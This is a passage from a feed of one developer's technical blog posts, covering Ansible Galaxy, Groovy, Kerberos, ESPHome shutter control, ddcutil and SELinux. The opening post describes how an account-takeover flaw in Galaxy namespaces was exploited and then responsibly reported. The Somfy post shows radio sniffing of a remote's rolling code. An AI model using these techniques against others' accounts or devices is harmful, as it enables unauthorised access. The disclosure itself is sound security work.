That means that if I ever want to share how to automate installing vim, I can publish evgeni.vim on Galaxy and other people can download that and use it. And if my evil twin wants their vim recipe published, it will end up being called evilme.vim. Thus while both recipes are called vim they can coexist, can be downloaded to the same machine, and used independently. How do you get a namespace? It's automatically created for you when you login for the first time. After that you can manage it, you can upload content, allow others to upload content and other things. You can also request additional namespaces, this is useful if you want one for an Organization or similar entities, which don't have a login for Galaxy. Apropos login, Galaxy uses GitHub for authentication, so you don't have to store yet another password, just smash that octocat! Did anyone actually click on those links above? If you did (you didn't, right?), you might have noticed another section in that document: Namespace Limitations. That says:
Namespace names in Galaxy are limited to lowercase word characters (i.e., a-z, 0-9) and _ , must have a minimum length of 2 characters, and cannot start with an _ . No other characters are allowed, including . , - , and space. The first time you log into Galaxy, the server will create a Namespace for you, if one does not already exist, by converting your username to lowercase, and replacing any - characters with _ .
For my login evgeni this is pretty boring, as the generated namespace is also evgeni. But for the GitHub user Evil-Pwnwil-666 it will become evil_pwnwil_666. This can be a bit confusing. Another confusing thing is that Galaxy supports two types of content: roles and collections, but namespaces are only for collections! So it is Evil-Pwnwil-666.vim if it's a role, but evil_pwnwil_666.vim if it's a collection. I think part of this split is because collections were added much later and have a much more well thought design of both the artifact itself and its delivery mechanisms. This is by the way very important for us! Due to the fact that collections (and namespaces!) were added later, there must be code that ensures that users who were created before also get a namespace. Galaxy does this (and I would have done it the same way) by hooking into the login process, and after the user is logged in it checks if a Namespace exists and if not it creates one and sets proper permissions. And this is also exactly where the issue was! The old code looked like this:
    # Create lowercase namespace if case insensitive search does not find match
    qs = models.Namespace.objects.filter(
        name__iexact=sanitized_username).order_by('name')
    if qs.exists():
        namespace = qs[0]
    else:
        namespace = models.Namespace.objects.create(**ns_defaults)
    namespace.owners.add(user)
See how namespace.owners.add is always called? Even if the namespace already existed? Yepp! But how can we exploit that? Any user either already has a namespace (and owns it) or doesn't have one that could be owned. And given users are tied to GitHub accounts, there is no way to confuse Galaxy here. Now, remember how I said one could request additional namespaces, for organizations and stuff? Those will have owners, but the namespace name might not correspond to an existing user! So all we need is to find an existing Galaxy namespace that is not a "default" namespace (aka a specially requested one) and get a GitHub account that (after the funny name conversion) matches the namespace name. Thankfully Galaxy has an API, so I could dump all existing namespaces and their owners. Next I filtered that list to have only namespaces where the owner list doesn't contain a username that would (after conversion) match the namespace name. I found a few. And for one of them (let's call it the_target), the corresponding GitHub username (the-target) was available! Jackpot! I've registered a new GitHub account with that name, logged in to Galaxy and had access to the previously found namespace. This felt like sufficient proof that my attack worked and I mailed my findings to the Ansible Security team. The issue was fixed in d4f84d3400f887a26a9032687a06dd263029bde3 by moving the namespace.owners.add call to the "new namespace" branch. And this concludes the story of how I accidentally got access to someone else's Galaxy namespace (which was revoked after the report, no worries).

19 November 2021

Evgeni Golov: A String is not a String, and that's Groovy!

Halloween is over, but I still have some nightmares to share with you, so sit down, take some hot chocolate and enjoy :) When working with Jenkins, there is almost no way to avoid writing Groovy. Well, unless you only do old style jobs with shell scripts, but y'all know what I think about shell scripts Anyways, Eric have been rewriting the jobs responsible for building Debian packages for Foreman to pipelines (and thus Groovy). Our build process for pull requests is rather simple:
  1. Setup sources - get the orig tarball and adjust changelog to have an unique version for pull requests
  2. Call pbuilder
  3. Upload the built package to a staging archive for testing
For merges, it's identical, minus the changelog adjustment. And if there are multiple packages changed in one go, it runs each step in parallel for each package. Now I've been doing mass changes to our plugin packages, to move them to a shared postinst helper instead of having the same code over and over in every package. This required changes to many packages and sometimes I'd end up building multiple at once. That should be fine, right? Well, yeah, it did build fine, but the upload only happened for the last package. This felt super weird, especially as I was absolutely sure we did test this scenario (multiple packages in one PR) and it worked just fine So I went on a ride though the internals of the job, trying to understand why it didn't work. This requires a tad more information about the way we handle packages for Foreman:
  • the archive is handled by freight
  • it has suites like buster, focal and plugins (that one is a tad special)
  • each suite has components that match Foreman releases, so 2.5, 3.0, 3.1, nightly etc
  • core packages (Foreman etc) are built for all supported distributions (right now: buster and focal)
  • plugin packages are built only once and can be used on every distribution
As generating the package index isn't exactly fast in freight, we tried not not run it too often. The idea was that when we build two packages for the same target (suite/version combination), we upload both at once and run import only once for both. That means that when we build Foreman for buster and focal, this results in two parallel builds and then two parallel uploads (as they end up in different suites). But if we build Foreman and Foreman Installer, we have four parallel builds, but only two parallel uploads, as we can batch upload Foreman and Installer per suite. Well, or so was the theory. The Groovy code, that was supposed to do this looked roughly like this:
def packages_to_build = find_changed_packages()
def repos = [:]
packages_to_build.each   pkg ->
    suite = 'buster'
    component = '3.0'
    target = "$ suite -$ component "
    if (!repos.containsKey(target))  
        repos[target] = []
     
    repos[target].add(pkg)
 
do_the_build(packages_to_build)
do_the_upload(repos)
That's pretty straight forward, no? We create an empty Map, loop over a list of packages and add them to an entry in the map which we pre-create as empty if it doesn't exist. Well, no, the resulting map always ended with only having one element in each target list. And this is also why our original tests always worked: we tested with a PR containing changes to Foreman and a plugin, and plugins go to this special target we have So I started playing with the code (https://groovyide.com/playground is really great for that!), trying to understand why the heck it erases previous data. The first finding was that it just always ended up jumping into the "if map entry not found" branch, even though the map very clearly had the correct entry after the first package was added. The second one was weird. I was trying to minimize the reproducer code (IMHO always a good idea) and switched target = "$ suite -$ component " to target = "lol". Two entries in the list, only one jump into the "map entry not found" branch. What?! So this is clearly related to the fact that we're using String interpolation here. But hey, that's a totally normal thing to do, isn't it?! Admittedly, at this point, I was lost. I knew what breaks, but not why. Luckily, I knew exactly who to ask: Jens. After a brief "well, that's interesting", Jens quickly found the source of our griefs: Double-quoted strings are plain java.lang.String if there s no interpolated expression, but are groovy.lang.GString instances if interpolation is present.. And when we do repos[target] the GString target gets converted to a String, but when we use repos.containsKey() it remains a GString. This is because GStrings get converted to Strings, if the method wants one, but containsKey takes any Object while the repos[target] notation for some reason converts it. Maybe this is because using GString as Map keys should be avoided. We can reproduce this with simpler code:
def map = [:]
def something = "something"
def key = "$ something "
map[key] = 1
println key.getClass()
map.keySet().each  println it.getClass()  
map.keySet().each  println it.equals(key) 
map.keySet().each  println it.equals(key as String) 
Which results in the following output:
class org.codehaus.groovy.runtime.GStringImpl
class java.lang.String
false
true
With that knowledge, the fix was to just use the same repos[target] notation also for checking for existence Groovy helpfully returns null which is false-y when it can't find an entry in a Map absent. So yeah, a String is not always a String, and it'll bite you!

6 November 2021

Evgeni Golov: I just want to run this one Python script

So I couldn't sleep the other night, and my brain wanted to think about odd problems Ever had a script that's compatible with both, Python 2 and 3, but you didn't want to bother the user to know which interpreter to call? Maybe because the script is often used in environments where only one Python is available (as either /usr/bin/python OR /usr/bin/python3) and users just expect things to work? And it's only that one script file, no package, no additional wrapper script, nothing. Yes, this is a rather odd scenario. And yes, using Python doesn't make it easier, but trust me, you wouldn't want to implement the same in bash. Nothing that you will read from here on should ever be actually implemented, it will summon dragons and kill kittens. But it was a fun midnight thought, and I like to share nightmares! The nice thing about Python is it supports docstrings, essentially strings you can put inside your code which are kind of comments, but without being hidden inside commnent blocks. These are often used for documentation that you can reach using Python's help() function. (Did I mention I love help()?) Bash on the other hand, does not support docstrings. Even better, it doesn't give a damn whether you quote commands or not. You can call "ls" and you'll get your directory listing the same way as with ls. Now, nobody would under normal circumstances quote ls. Parameters to it, sure, those can contain special characters, but ls?! Another nice thing about Python: it doesn't do any weird string interpolation by default (ssssh, f-strings are cool, but not default). So "$(ls)" is exactly that, a string containing a Dollar sign, an open parenthesis, the characters "l" and "s" and a closing parenthesis. Bash, well, Bash will run ls, right? If you don't yet know where this is going, you have a clean mind, enjoy it while it lasts! So another thing that Bash has is exec: "replace[s] the shell without creating a new process". That means that if you write exec python in your script, the process will be replaced with Python, and when the Python process ends, your script ends, as Bash isn't running anymore. Well, technically, your script ended the moment exec was called, as at that point there was no more Bash process to execute the script further. Using exec is a pretty common technique if you want to setup the environment for a program and then call it, without Bash hanging around any longer as it's not needed. So we could have a script like this:
#!/bin/bash
exec python myscript.py "$@"
Here "$@" essentially means "pass all parameters that were passed to this Bash script to the Python call" (see parameter expansion). We could also write it like this:
#!/bin/bash
"exec" "python" "myscript.py" "$@"
As far as Bash is concerned, this is the same script. But it just became valid Python, as for Python those are just docstrings. So, given this is a valid Bash script and a valid Python script now, can we make it do something useful in the Python part? Sure!
#!/bin/bash
"exec" "python" "myscript.py" "$@"
print("lol")
If we call this using Bash, it never gets further than the exec line, and when called using Python it will print lol as that's the only effective Python statement in that file. Okay, but what if this script would be called myscript.py? Exactly, calling it with Python would print lol and calling it with Bash would end up printing lol too (because it gets re-executed with Python). We can even make it name-agnostic, as Bash knows the name of the script we called:
#!/bin/bash
"exec" "python" "$0" "$@"
print("lol")
But this is still calling python, and it could be python3 on the target (or even something worse, but we're not writing a Halloween story here!). Enter another Bash command: command (SCNR!), especially "The -v option causes a single word indicating the command or file name used to invoke command to be displayed". It will also exit non-zero if the command is not found, so we can do things like $(command -v python3 command -v python) to find a Python on the system.
#!/bin/bash
"exec" "$(command -v python3   command -v python)" "$0" "$@"
print("lol")
Not well readable, huh? Variables help!
#!/bin/bash
__PYTHON="$(command -v python3   command -v python)"
"exec" "$ __PYTHON " "$0" "$@"
print("lol")
For Python the variable assignment is just a var with a weird string, for Bash it gets executed and we store the result. Nice! Now we have a Bash header that will find a working Python and then re-execute itself using said Python, allowing us to use some proper scripting language. If you're worried that $0 won't point at the right file, just wrap it with some readlink -f .

23 July 2021

Evgeni Golov: It's not *always* DNS

Two weeks ago, I had the pleasure to play with Foremans Kerberos integration and iron out a few long standing kinks. It all started with a user reminding us that Kerberos authentication is broken when Foreman is deployed on CentOS 8, as there is no more mod_auth_kerb available. Given mod_auth_kerb hasn't seen a release since 2013, this is quite understandable. Thankfully, there is a replacement available, mod_auth_gssapi. Even better, it's available in CentOS 7 and 8 and in Debian and Ubuntu too! So I quickly whipped up a PR to completely replace mod_auth_kerb with mod_auth_gssapi in our installer and successfully tested that it still works in CentOS 7 (even if upgrading from a mod_auth_kerb installation) and CentOS 8. Yay, the issue at hand seemed fixed. But just writing a post about that would've been boring, huh? Well, and then I dared to test the same on Debian Turns out, our installer was using the wrong path to the Apache configuration and the wrong username Apache runs under while trying to setup Kerberos, so it could not have ever worked. Luckily Ewoud and I were able to fix that too. And yet the installer was still unable to fetch the keytab from my FreeIPA server Let's dig deeper! To fetch the keytab, the installer does roughly this:
# kinit -k
# ipa-getkeytab -k http.keytab -p HTTP/foreman.example.com
And if one executes that by hand to see the a actual error, you see:
# kinit -k
kinit: Cannot determine realm for host (principal host/foreman@)
Well, yeah, the principal looks kinda weird (no realm) and the interwebs say for "kinit: Cannot determine realm for host":
  • Kerberos cannot determine the realm name for the host. (Well, duh, that's what it said?!)
  • Make sure that there is a default realm name, or that the domain name mappings are set up in the Kerberos configuration file (krb5.conf)
And guess what, all of these are perfectly set by ipa-client-install when joining the realm But there must be something, right? Looking at the principal in the error, it's missing both the domain of the host and the realm. I was pretty sure that my DNS and config was right, but what about gethostname(2)?
# hostname
foreman
Bingo! Let's see what happens if we force that to be an FQDN?
# hostname foreman.example.com
# kinit -k
NO ERRORS! NICE! We're doing science here, right? And I still have the CentOS 8 box I had for the previous round of tests. What happens if we set that to have a shortname? Nothing. It keeps working fine. And what about CentOS 7? VMs are cheap. Well, that breaks like on Debian, if we force the hostname to be short. Interesting. Is it a version difference between the systems?
  • Debian 10 has krb5 1.17-3+deb10u1
  • CentOS 7 has krb5 1.15.1-50.el7
  • CentOS 8 has krb5 1.18.2-8.el8
So, something changed in 1.18? Looking at the krb5 1.18 changelog the following entry jumps at one: Expand single-component hostnames in host-based principal names when DNS canonicalization is not used, adding the system's first DNS search path as a suffix. Given Debian 11 has krb5 1.18.3-5 (well, testing has, so lets pretend bullseye will too), we can retry the experiment there, and it shows that it works with both, short and full hostname. So yeah, it seems krb5 "does the right thing" since 1.18, and before that gethostname(2) must return an FQDN. I've documented that for our users and can now sleep a bit better. At least, it wasn't DNS, right?! Btw, freeipa won't be in bulsseye, which makes me a bit sad, as that means that Foreman won't be able to automatically join FreeIPA realms if deployed on Debian 11.

6 June 2021

Evgeni Golov: Controlling Somfy roller shutters using an ESP32 and ESPHome

Our house has solar powered, remote controllable roller shutters on the roof windows, built by the German company named HEIM & HAUS. However, when you look closely at the remote control or the shutter motor, you'll see another brand name: SIMU. As the shutters don't have any wiring inside the house, the only way to control them is via the remote interface. So let's go on the Internet and see how one can do that, shall we? ;) First thing we learn is that SIMU remote stuff is just re-branded Somfy. Great, another name! Looking further we find that Somfy uses some obscure protocol to prevent (replay) attacks (spoiler: it doesn't!) and there are tools for RTL-SDR and Arduino available. That's perfect! Always sniff with RTL-SDR first! Given the two re-brandings in the supply chain, I wasn't 100% sure our shutters really use the same protocol. So the first "hack" was to listen and decrypt the communication using RTL-SDR:
$ git clone https://github.com/dimhoff/radio_stuff
$ cd radio_stuff
$ make -C converters am_to_ook
$ make -C decoders decode_somfy
$ rtl_fm -M am -f 433.42M -s 270K   ./am_to_ook -d 10 -t 2000 -    ./decode_somfy
<press some buttons on the remote>
The output contains the buttons I pressed, but also the id of the remote and the command counter (which is supposed to prevent replay attacks). At this point I could just use the id and the counter to send own commands, but if I'd do that too often, the real remote would stop working, as its counter won't increase and the receiver will drop the commands when the counters differ too much. But that's good enough for now. I know I'm looking for the right protocol at the right frequency. As the end result should be an ESP32, let's move on! Acquiring the right hardware Contrary to an RTL-SDR, one usually does not have a spare ESP32 with 433MHz radio at home, so I went shopping: a NodeMCU-32S clone and a CC1101. The CC1101 is important as most 433MHz chips for Arduino/ESP only work at 433.92MHz, but Somfy uses 433.42MHz and using the wrong frequency would result in really bad reception. The CC1101 is essentially an SDR, as you can tune it to a huge spectrum of frequencies. Oh and we need some cables, a bread board, the usual stuff ;) The wiring is rather simple: ESP32 wiring for a CC1101 And the end result isn't too beautiful either, but it works: ESP32 and CC1101 in a simple case Acquiring the right software In my initial research I found an Arduino sketch and was totally prepared to port it to ESP32, but luckily somebody already did that for me! Even better, it's explicitly using the CC1101. Okay, okay, I cheated, I actually ordered the hardware after I found this port and the reference to CC1101. ;) As I am using ESPHome for my ESPs, the idea was to add a "Cover" that's controlling the shutters to it. Writing some C++, how hard can it be? Turns out, not that hard. You can see the code in my GitHub repo. It consists of two (relevant) files: somfy_cover.h and somfy.yaml. somfy_cover.h essentially wraps the communication with the Somfy_Remote_Lib library into an almost boilerplate Custom Cover for ESPHome. There is nothing too fancy in there. The only real difference to the "Custom Cover" example from the documentation is the split into SomfyESPRemote (which inherits from Component) and SomfyESPCover (which inherits from Cover) -- this is taken from the Custom Sensor documentation and allows me to define one "remote" that controls multiple "covers" using the add_cover function. The first two params of the function are the NVS name and key (think database table and row), and the third is the rolling code of the remote (stored in somfy_secrets.h, which is not in Git). In ESPHome a Cover shall define its properties as CoverTraits. Here we call set_is_assumed_state(true), as we don't know the state of the shutters - they could have been controlled using the other (real) remote - and setting this to true allows issuing open/close commands at all times. We also call set_supports_position(false) as we can't tell the shutters to move to a specific position. The one additional feature compared to a normal Cover interface is the program function, which allows to call the "program" command so that the shutters can learn a new remote. somfy.yaml is the ESPHome "configuration", which contains information about the used hardware, WiFi credentials etc. Again, mostly boilerplate. The interesting parts are the loading of the additional libraries and attaching the custom component with multiple covers and the additional PROG switches:
esphome:
  name: somfy
  platform: ESP32
  board: nodemcu-32s
  libraries:
    - SmartRC-CC1101-Driver-Lib@2.5.6
    - Somfy_Remote_Lib@0.4.0
    - EEPROM
  includes:
    - somfy_secrets.h
    - somfy_cover.h
 
cover:
  - platform: custom
    lambda:  -
      auto somfy_remote = new SomfyESPRemote();
      somfy_remote->add_cover("somfy", "badezimmer", SOMFY_REMOTE_BADEZIMMER);
      somfy_remote->add_cover("somfy", "kinderzimmer", SOMFY_REMOTE_KINDERZIMMER);
      App.register_component(somfy_remote);
      return somfy_remote->covers;
    covers:
      - id: "somfy"
        name: "Somfy Cover"
      - id: "somfy2"
        name: "Somfy Cover2"
switch:
  - platform: template
    name: "PROG"
    turn_on_action:
      - lambda:  -
          ((SomfyESPCover*)id(somfy))->program();
  - platform: template
    name: "PROG2"
    turn_on_action:
      - lambda:  -
          ((SomfyESPCover*)id(somfy2))->program();
The switch to trigger the program mode took me a bit. As the Cover interface of ESPHome does not offer any additional functions besides movement control, I first wrote code to trigger "program" when "stop" was pressed three times in a row, but that felt really cumbersome and also had the side effect that the remote would send more than needed, sometimes confusing the shutters. I then decided to have a separate button (well, switch) for that, but the compiler yelled at me I can't call program on a Cover as it does not have such a function. Turns out, you need to explicitly cast to SomfyESPCover and then it works, even if the code becomes really readable, NOT. Oh and as the switch does not have any code to actually change/report state, it effectively acts as a button that can be pressed. At this point we can just take an existing remote, press PROG for 5 seconds, see the blinds move shortly up and down a bit and press PROG on our new ESP32 remote and the shutters will learn the new remote. And thanks to the awesome integration of ESPHome into HomeAssistant, this instantly shows up as a new controllable cover there too. Future Additional Work I started writing this post about a year ago And the initial implementation had some room for improvement More than one remote The initial code only created one remote and one cover element. Sure, we could attach that to all shutters (there are 4 of them), but we really want to be able to control them separately. Thankfully I managed to read enough ESPHome docs, and learned how to operate std::vector to make the code dynamically accept new shutters. Using ESP32's NVS The ESP32 has a non-volatile key-value storage which is much nicer than throwing bits at an emulated EEPROM. The first library I used for that explicitly used EEPROM storage and it would have required quite some hacking to make it work with NVS. Thankfully the library I am using now has a plugable storage interface, and I could just write the NVS backend myself and upstream now supports that. Yay open-source! Remaining issues Real state is unknown As noted above, the ESP does not know the real state of the shutters: a command could have been lost in transmission (the Somfy protocol is send-only, there is no feedback) or the shutters might have been controlled by another remote. At least the second part could be solved by listening all the time and trying to decode commands heard over the air, but I don't think this is worth the time -- worst that can happen is that a closed (opened) shutter receives another close (open) command and that is harmless as they have integrated endstops and know that they should not move further. Can't program new remotes with ESP only To program new remotes, one has to press the "PROG" button for 5 seconds. This was not exposed in the old library, but the new one does support "long press", I just would need to add another ugly switch to the config and I currently don't plan to do so, as I do have working remotes for the case I need to learn a new one.

18 January 2021

Evgeni Golov: building a simple KVM switch for 30

Prompted by tweets from Lesley and Dave, I thought about KVM switches again and came up with a rather cheap solution to my individual situation (YMMY, as usual). As I've written last year, my desk has one monitor, keyboard and mouse and two computers. Since writing that post I got a new (bigger) monitor, but also an USB switch again (a DIGITUS USB 3.0 Sharing Switch) - this time one that doesn't freak out my dock \o/ However, having to switch the used computer in two places (USB and monitor) is rather inconvenient, but also getting an KVM switch that can do 4K@60Hz was out of question. Luckily, hackers gonna hack, everything, and not only receipt printers ( ). There is a tool called ddcutil that can talk to your monitor and change various settings. And udev can execute commands when (USB) devices connect You see where this is going? After installing the package (available both in Debian and Fedora), we can inspect our system with ddcutil detect. You might have to load the i2c_dev module (thanks Philip!) before this works -- it seems to be loaded automatically on my Fedora, but you never know .
$ sudo ddcutil detect
Invalid display
   I2C bus:             /dev/i2c-4
   EDID synopsis:
      Mfg id:           BOE
      Model:
      Serial number:
      Manufacture year: 2017
      EDID version:     1.4
   DDC communication failed
   This is an eDP laptop display. Laptop displays do not support DDC/CI.
Invalid display
   I2C bus:             /dev/i2c-5
   EDID synopsis:
      Mfg id:           AOC
      Model:            U2790B
      Serial number:
      Manufacture year: 2020
      EDID version:     1.4
   DDC communication failed
Display 1
   I2C bus:             /dev/i2c-7
   EDID synopsis:
      Mfg id:           AOC
      Model:            U2790B
      Serial number:
      Manufacture year: 2020
      EDID version:     1.4
   VCP version:         2.2
The first detected display is the built-in one in my laptop, and those don't support DDC anyways. The second one is a ghost (see ddcutil#160) which we can ignore. But the third one is the one we can (and will control). As this is the only valid display ddcutil found, we don't need to specify which display to talk to in the following commands. Otherwise we'd have to add something like --display 1 to them. A ddcutil capabilities will show us what the monitor is capable of (or what it thinks, I've heard some give rather buggy output here) -- we're mostly interested in the "Input Source" feature (Virtual Control Panel (VCP) code 0x60):
$ sudo ddcutil capabilities
 
   Feature: 60 (Input Source)
      Values:
         0f: DisplayPort-1
         11: HDMI-1
         12: HDMI-2
 
Seems mine supports it, and I should be able to switch the inputs by jumping between 0x0f, 0x11 and 0x12. You can see other values defined by the spec in ddcutil vcpinfo 60 --verbose, some monitors are using wrong values for their inputs . Let's see if ddcutil getvcp agrees that I'm using DisplayPort now:
$ sudo ddcutil getvcp 0x60
VCP code 0x60 (Input Source                  ): DisplayPort-1 (sl=0x0f)
And try switching to HDMI-1 using ddcutil setvcp:
$ sudo ddcutil setvcp 0x60 0x11
Cool, cool. So now we just need a way to trigger input source switching based on some event There are three devices connected to my USB switch: my keyboard, my mouse and my Yubikey. I do use the mouse and the Yubikey while the laptop is not docked too, so these are not good indicators that the switch has been turned to the laptop. But the keyboard is! Let's see what vendor and product IDs it has, so we can write an udev rule for it:
$ lsusb
 
Bus 005 Device 006: ID 17ef:6047 Lenovo ThinkPad Compact Keyboard with TrackPoint
 
Okay, so let's call ddcutil setvcp 0x60 0x0f when the USB device 0x17ef:0x6047 is added to the system:
ACTION=="add", SUBSYSTEM=="usb", ATTR idVendor =="17ef", ATTR idProduct =="6047", RUN+="/usr/bin/ddcutil setvcp 0x60 0x0f"
$ sudo vim /etc/udev/rules.d/99-ddcutil.rules
$ sudo udevadm control --reload
And done! Whenever I connect my keyboard now, it will force my screen to use DisplayPort-1. On my workstation, I deployed the same rule, but with ddcutil setvcp 0x60 0x11 to switch to HDMI-1 and my cheap not-really-KVM-but-in-the-end-KVM-USB-switch is done, for the price of one USB switch (~30 ). Note: if you want to use ddcutil with a Lenovo Thunderbolt 3 Dock (or any other dock using Displayport Multi-Stream Transport (MST)), you'll need kernel 5.10 or newer, which fixes a bug that prevents ddcutil from talking to the monitor using I C.

11 December 2020

Evgeni Golov: systemd + SELinux =

Okay, getting a title that will ensure clicks for this post was easy. Now comes the hard part: content! When you deploy The Foreman, you want a secure setup by default. That's why we ship (and enable) a SELinux policy which allows you to run the involved daemons in confined mode. We have recently switched our default Ruby application server from Passenger (running via mod_passenger inside Apache httpd) to Puma (running standalone and Apache just being a reverse proxy). While doing so, we initially deployed Puma listening on localhost:3000 and while localhost is pretty safe, a local user could still turn out evil and talk directly to Puma, pretending to be authenticated by Apache (think Kerberos or X.509 cert auth). Obviously, this is not optimal, so the next task was to switch Puma to listen on an UNIX socket and only allow Apache to talk to said socket. This doesn't sound overly complicated, and indeed it wasn't. The most time/thought was spent on doing that in a way that doesn't break existing setups and still allows binding to a TCP socket for setups where users explicitly want that. We also made a change to the SELinux policy to properly label the newly created socket and allow httpd to access it. The whole change was carefully tested on CentOS 7 and worked like a charm. So we merged it, and it broke. Only on CentOS 8, but broken is broken, right? This is the start of my Thanksgiving story "learn how to debug SELinux issues" ;) From the logs of our integration test I knew the issue was Apache not being able to talk to that new socket (we archive sos reports as part of the tests, and those clearly had it in the auditd logs). But I also knew we did prepare our policy for that change, so either our preparation was not sufficient or the policy wasn't properly loaded. The same sos report also contained the output of semanage fcontext --list which stated that all regular files called /run/foreman.sock would get the foreman_var_run_t type assigned. Wait a moment, all regular files?! A socket is not a regular file! Let's quickly make that truly all files. That clearly changed the semanage fcontext --list output, but the socket was still created as var_run_t?! It was time to actually boot a CentOS 8 VM and try more things out. Interestingly, you actually can't add a rule for /run/something, as /run is an alias (equivalency in SELinux speak) for /var/run:
# semanage fcontext --add -t foreman_var_run_t /run/foreman.sock
ValueError: File spec /run/foreman.sock conflicts with equivalency rule '/run /var/run'; Try adding '/var/run/foreman.sock' instead
I have no idea how the list output in the report got that /run rule, but okay, let's match /var/run/foreman.sock. Did that solve the issue? Of course not! And you knew it, as I didn't get to the juciest part of the headline yet: systemd! We use systemd to create the socket, as it is both convenient and useful (no more clients connecting before Rails has finished booting). But why is it wrongly labeling our freshly created socket?! A quick check with touch shows that the policy is correct now, the touched file gets the right type assigned. So it must be something with systemd A bit of poking (and good guesswork based on prior experience with a similar issue in Puppet: PUP-2169 and PUP-10548) led to the realization that a systemctl daemon-reexec after adding the file context rule "fixes" the issue. Moving the poking to Google, you quickly end up at systemd issue #9997 which is fixed in v245, but that's in no EL release yet. And indeed, the issue seems fixed on my Fedora 33 with systemd 246, but I still need it to work on CentOS 7 and 8 Well, maybe that reexec isn't that bad after all? At least the socket is now properly labeled and httpd can connect to it on CentOS 8. Btw, no idea why the connection worked on CentOS 7, as there the socket was also wrongly labeled, but SELinux didn't deny httpd to open it. Big shout out to lzap and ewoud for helping me with this beast!

24 July 2020

Evgeni Golov: Building documentation for Ansible Collections using antsibull

In my recent post about building and publishing documentation for Ansible Collections, I've mentioned that the Ansible Community is currently in the process of making their build tools available as a separate project called antsibull instead of keeping them in the hacking directory of ansible.git. I've also said that I couldn't get the documentation to build with antsibull-docs as it wouldn't support collections yet. Thankfully, Felix Fontein, one of the maintainers of antsibull, pointed out that I was wrong and later versions of antsibull actually have partial collections support. So I went ahead and tried it again. And what should I say? Two bug reports by me and four patches by Felix Fontain later I can use antsibull-docs to generate the Foreman Ansible Modules documentation! Let's see what's needed instead of the ugly hack in detail. We obviously don't need to clone ansible.git anymore and install its requirements manually. Instead we can just install antsibull (0.17.0 contains all the above patches). We also need Ansible (or ansible-base) 2.10 or never, which currently only exists as a pre-release. 2.10 is the first version that has an ansible-doc that can list contents of a collection, which antsibull-docs requires to work properly. The current implementation of collections documentation in antsibull-docs requires the collection to be installed as in "Ansible can find it". We had the same requirement before to find the documentation fragments and can just re-use the installation we do for various other build tasks in build/collection and point at it using the ANSIBLE_COLLECTIONS_PATHS environment variable or the collections_paths setting in ansible.cfg1. After that, it's only a matter of passing --use-current to make it pick up installed collections instead of trying to fetch and parse them itself. Given the main goal of antisibull-docs collection is to build documentation for multiple collections at once, it defaults to place the generated files into <dest-dir>/collections/<namespace>/<collection>. However, we only build documentation for one collection and thus pass --squash-hierarchy to avoid this longish path and make it generate documentation directly in <dest-dir>. Thanks to Felix for implementing this feature for us! And that's it! We can generate our documentation with a single line now!
antsibull-docs collection --use-current --squash-hierarchy --dest-dir ./build/plugin_docs theforeman.foreman
The PR to switch to antsibull is open for review and I hope to get merged in soon! Oh and you know what's cool? The documentation is now also available as a preview on ansible.com!

  1. Yes, the paths version of that setting is deprecated in 2.10, but as we support older Ansible versions, we still use it.

20 July 2020

Evgeni Golov: Building and publishing documentation for Ansible Collections

I had a draft of this article for about two months, but never really managed to polish and finalize it, partially due to some nasty hacks needed down the road. Thankfully, one of my wishes was heard and I had now the chance to revisit the post and try a few things out. Sadly, my wish was granted only partially and the result is still not beautiful, but read yourself ;-) UPDATE: I've published a follow up post on building documentation for Ansible Collections using antsibull, as my wish was now fully granted. As part of my day job, I am maintaining the Foreman Ansible Modules - a collection of modules to interact with Foreman and its plugins (most notably Katello). We've been maintaining this collection (as in set of modules) since 2017, so much longer than collections (as in Ansible Collections) existed, but the introduction of Ansible Collections allowed us to provide a much easier and supported way to distribute the modules to our users. Now users usually want two things: features and documentation. Features are easy, we already have plenty of them. But documentation was a bit cumbersome: we had documentation inside the modules, so you could read it via ansible-doc on the command line if you had the collection installed, but we wanted to provide online readable and versioned documentation too - something the users are used to from the official Ansible documentation. Building HTML from Ansible modules Ansible modules contain documentation in form of YAML blocks documenting the parameters, examples and return values of the module. The Ansible documentation site is built using Sphinx from reStructuredText. As the modules don't contain reStructuredText, Ansible hashad a tool to generate it from the documentation YAML: build-ansible.py document-plugins. The tool and the accompanying libraries are not part of the Ansible distribution - they just live in the hacking directory. To run them we need a git checkout of Ansible and source hacking/env-setup to set PYTHONPATH and a few other variables correctly for Ansible to run directly from that checkout. It would be nice if that'd be a feature of ansible-doc, but while it isn't, we need to have a full Ansible git checkout to be able to continue.The tool has been recently split out into an own repository/distribution: antsibull. However it was also a bit redesigned to be easier to use (good!), and my hack to abuse it to build documentation for out-of-tree modules doesn't work anymore (bad!). There is an issue open for collections support, so I hope to be able to switch to antsibull soon. Anyways, back to the original hack. As we're using documentation fragments, we need to tell the tool to look for these, because otherwise we'd get errors about not found fragments. We're passing ANSIBLE_COLLECTIONS_PATHS so that the tool can find the correct, namespaced documentation fragments there. We also need to provide --module-dir pointing at the actual modules we want to build documentation for.
ANSIBLEGIT=/path/to/ansible.git
source $ ANSIBLEGIT /hacking/env-setup
ANSIBLE_COLLECTIONS_PATHS=../build/collections python3 $ ANSIBLEGIT /hacking/build-ansible.py document-plugins --module-dir ../plugins/modules --template-dir ./_templates --template-dir $ ANSIBLEGIT /docs/templates --type rst --output-dir ./modules/
Ideally, when antsibull supports collections, this will become antsibull-docs collection without any need to have an Ansible checkout, sourcing env-setup or pass tons of paths. Until then we have a Makefile that clones Ansible, runs the above command and then calls Sphinx (which provides a nice Makefile for building) to generate HTML from the reStructuredText. You can find our slightly modified templates and themes in our git repository in the docs directory. Publishing HTML documentation for Ansible Modules Now that we have a way to build the documentation, let's also automate publishing, because nothing is worse than out-of-date documentation! We're using GitHub and GitHub Actions for that, but you can achieve the same with GitLab, TravisCI or Jenkins. First, we need a trigger. As we want always up-to-date documentation for the main branch where all the development happens and also documentation for all stable releases that are tagged (we use vX.Y.Z for the tags), we can do something like this:
on:
  push:
    tags:
      - v[0-9]+.[0-9]+.[0-9]+
    branches:
      - master
Now that we have a trigger, we define the job steps that get executed:
    steps:
      - name: Check out the code
        uses: actions/checkout@v2
      - name: Set up Python
        uses: actions/setup-python@v2
        with:
          python-version: "3.7"
      - name: Install dependencies
        run: make doc-setup
      - name: Build docs
        run: make doc
At this point we will have the docs built by make doc in the docs/_build/html directory, but not published anywhere yet. As we're using GitHub anyways, we can also use GitHub Pages to host the result.
      - uses: actions/checkout@v2
      - name: configure git
        run:  
          git config user.name "$ GITHUB_ACTOR "
          git config user.email "$ GITHUB_ACTOR @bots.github.com"
          git fetch --no-tags --prune --depth=1 origin +refs/heads/*:refs/remotes/origin/*
      - name: Set up Python
        uses: actions/setup-python@v2
        with:
